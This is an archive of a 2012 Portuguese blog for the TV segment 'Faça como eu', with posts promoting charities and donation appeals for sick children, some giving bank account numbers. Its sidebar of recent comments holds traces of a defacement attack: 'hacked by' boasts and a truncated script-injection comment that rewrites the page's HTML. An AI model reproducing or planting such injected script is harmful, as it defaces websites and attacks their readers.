faca_como_eu @ 14:17

Sex, 26/10/12

A AMI realiza anualmente, desde 1996, a Campanha de Reciclagem de Radiografias.

 

A AMI apela para que a população em geral contribua deixando as suas radiografias com mais de 5 anos ou aquelas que já não têm valor de diagnóstico, nos sacos disponíveis em qualquer farmácia, sem relatórios, envelopes ou folhas de papel.

 

Cada tonelada de radiografias dá origem a cerca de 10Kg de prata. A venda da prata ajuda a AMI a partir para pontos do mundo onde a ajuda humanitária seja premente.

 

Saiba como pode ajudar...


PEDITÓRIO ANUAL DA AMI:

Entidade: 20909

Referência: 909 909 909

 

Veja o vídeo aqui!




faca_como_eu @ 10:08

Seg, 15/10/12

A B-local é um projecto composto por jovens com licenciaturas desempregados,voluntários com vontade de fazer valer as suas competências, contribuindo para o melhoramento da comunidade.

O projecto visa ocupar os idosos com aulas de dança, canto, noites de fado e actividades de convívio entre idosos e crianças. A eles juntaram-se outros voluntários que dinamizam as actividades.

 

Conheça tudo sobre este projecto com Paulo Sousa Costa e Xavier Baltazar Pereira.

 

Veja o vídeo aqui!




faca_como_eu @ 17:13

Sex, 28/09/12

Os Bancos Alimentares iniciaram uma campanha “Papel por Alimentos” com contornos ambientais e de solidariedade no âmbito da qual o papel angariado (jornais, revistas, folhetos, etc.) é convertido em produtos alimentares.

 

A Campanha “Papel por Alimentos” integra-se num ideal mais vasto de sensibilização para a importância do papel de cada pessoa na sociedade e para a possibilidade de recuperar e reutilizar coisas que parecem não ter valor.

 

Bancoalimenta.pt

www.facebook.com (Faça Como eu)

 

Veja o vídeo aqui!




faca_como_eu @ 18:19

Sex, 14/09/12

Tem apenas 6 anos de idade e podia ser uma criança como outra qualquer, mas não é!
O Afonso sofre de um problema de saúde muito grave, vive dependente de oxigénio 24 horas por dia, pois um dos seus pulmões não funciona.
Recentemente foi dito aos seus pais que o outro pulmão também está a deixar de funcionar e que por isso tem a vida em risco...
Apesar deste problema de saúde, como outra criança da sua idade, o Afonso adora passear, brincar e jogar futebol, mas nem sempre consegue.
Para sobreviver o Afonso terá de ser sujeito a uma intervenção cirúrgica em Espanha. Mas os seus pais não têm condições financeiras e estão a pedir ajuda.

Um pequeno gesto seu pode representar um enorme passo na vida desta criança!

Conta BES: Afonso Pinto Vargas
NIB 0007 00000070159013723




faca_como_eu @ 18:16

Sex, 27/07/12

Se há exemplos de que desistir não é opção, a Sara Duarte é um deles.
A paralisia cerebral de cerca de 70% que a afecta seria, aparentemente, razão mais do que suficiente para que a Sara pouco ou nada fizesse na vida.
Mas a sua enorme força vontade levou-a a praticar desporto e encontrou na equitação um aliado para uma integração mais rápida na sociedade.
A Sara faz praticamente tudo sozinha, provando que,quando queremos verdadeiramente atingir um objectivo, somos capazes e nem mesmo uma paralisia cerebral é impedimento.
Ciente de que o desporto não era suficiente para se sentir uma pessoa útil, a Sara nunca deixou de estudar.
Concluiu o curso de Farmácia e hoje tem uma vida profissional perfeitamente adaptada, trabalhando várias horas por dia numa farmácia, a atender e a ajudar os clientes que lá vão.
Foram também muitas as horas de treino e persistência que culminaram no seu apuramento para os próximos Jogos Paralímpicos, em Londres, para onde irá viajar no final do mês de Agosto.

Mas para isso, a Sara e o seu treinador precisam de ajuda na aquisição de um jipe novo...

Não perca esta história de coragem e persistência na rubrica "Faça como eu" e ajude!!

http://www.academiaequestrecardiga.com/




faca_como_eu @ 11:30

Sex, 13/07/12

A Fundação Vítor Baía foi criada em Junho de 2004 tendo como princípio de intervenção e objectivo primordial o apoio ao desenvolvimento social, económico, cultural, educativo, desportivo e artístico dos mais necessitados nas diversas áreas, sendo a sua principal preocupação as crianças e adolescentes. Desde a sua implementação a Fundação tem pautado a sua acção/ intervenção com vista à concretização deste fim. Neste contexto, apresenta já um conjunto alargado de acções abrangem variadíssimos sectores, desde intervenções ao nível financeiro no apoio a Instituições de Solidariedade Social, ao nível da cedência de materiais desportivos, educativos e lúdicos, cedência de material hospitalar em diversos serviços pediátricos do país e mesmo através de apoios individualizados. Face a todo o trabalho desenvolvido, em Junho de 2007, a Fundação Vítor Baía é equiparada a Instituições Particulares de Solidariedade Social e a que acresce o reconhecimento como pessoa colectiva de utilidade pública. A Fundação Vítor Baía neste momento está dar o pontapé de saída para uma nova etapa, com novos projectos, entre eles, um grande projecto de resposta social que esperamos que seja uma marca na história desta instituição.

 

AJUDE A CONCRETIZAR OS NOSSOS PROJECTOS

760 20 60 50 (CUSTO DA CHAMADA 0,60€ + IVA)

 

Paulo Sousa Costa e Vitor Baia estarão no Mais Mulher para nos contarem tudo sobre esta Fundação!

 

www.fundacaovitorbaia.com

 






faca_como_eu @ 18:33

Qui, 28/06/12

Contaremos com a presença de Paulo Sousa da Costa e Beatriz Quintela para nos revelarem tudo aquilo que está por trás de um dos mais importantes movimentos no nosso país, a “Operação Nariz Vermelho”.

Conheça este movimento solidário, na rubrica “Faça como Eu”.

http://www.narizvermelho.pt/




faca_como_eu @ 18:30

Qui, 14/06/12

Cada vez há mais animais abandonados e a crise também tem sido um factor que acaba por contribuir para este fenómeno.

A Associação Animais de Rua tem como principal objectivo a esterilização de animais carenciados. Paulo Sousa Costa conta-nos tudo sobre esta associação na rubrica "Faça como Eu"!

Seja solidário e ajuda também!

Como ajudar: http://www.animaisderua.org/ajudar




faca_como_eu @ 18:33

Sex, 25/05/12

Até aos 3 anos de idade o Renato era uma criança saudável e feliz como outra qualquer, corria, brincava e tinha muita energia.
3 anos depois precisa do auxílio dos seus papás para andar...
Um tumor cerebral que não pode ser retirado provocou no Renato uma paralisia dos membros, impedindo-o de ter uma via normal.

Paulo Sousa Costa não ficou parado quando um dia, lhe falaram, de ser solidário!

Saiba tudo na rubrica "Faça como eu" e ajude o Renato!!

Os papás do Renato decidiram fazer um apelo a todos os portugueses e estão a tentar angariar dinheiro suficiente que um dia pode devolver a mobilidade ao seu filhote.


NIB: 003.505.740.000.264.643.018 Caixa Geral de Depósitos

Página de facebook: Vamos Ajudar o Renato




faca_como_eu @ 12:20

Sex, 11/05/12

São amigos mesmo sem conhecer as pessoas que apoiam. A Liga dos Amigos do Hospital de Cascais é um grupo de voluntários que ajuda diariamente quem se dirige a esta unidade hospitalar.

Vestem uma bata amarela e estão todos os dias no Hospital de Cascais prontos para ajudar quem precisa.

Dão apoio a vários níveis desde à simples inscrição nas consultas indo mesmo até ao apoio moral para os casos mais graves, como o caso da unidade de oncologia, onde fomos encontrar a Relações Públicas Bibá Pita, mãe de 5 filhos, mas que ainda tem tempo para dedicar muita da sua energia a quem se encontra numa situação debilitada.



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO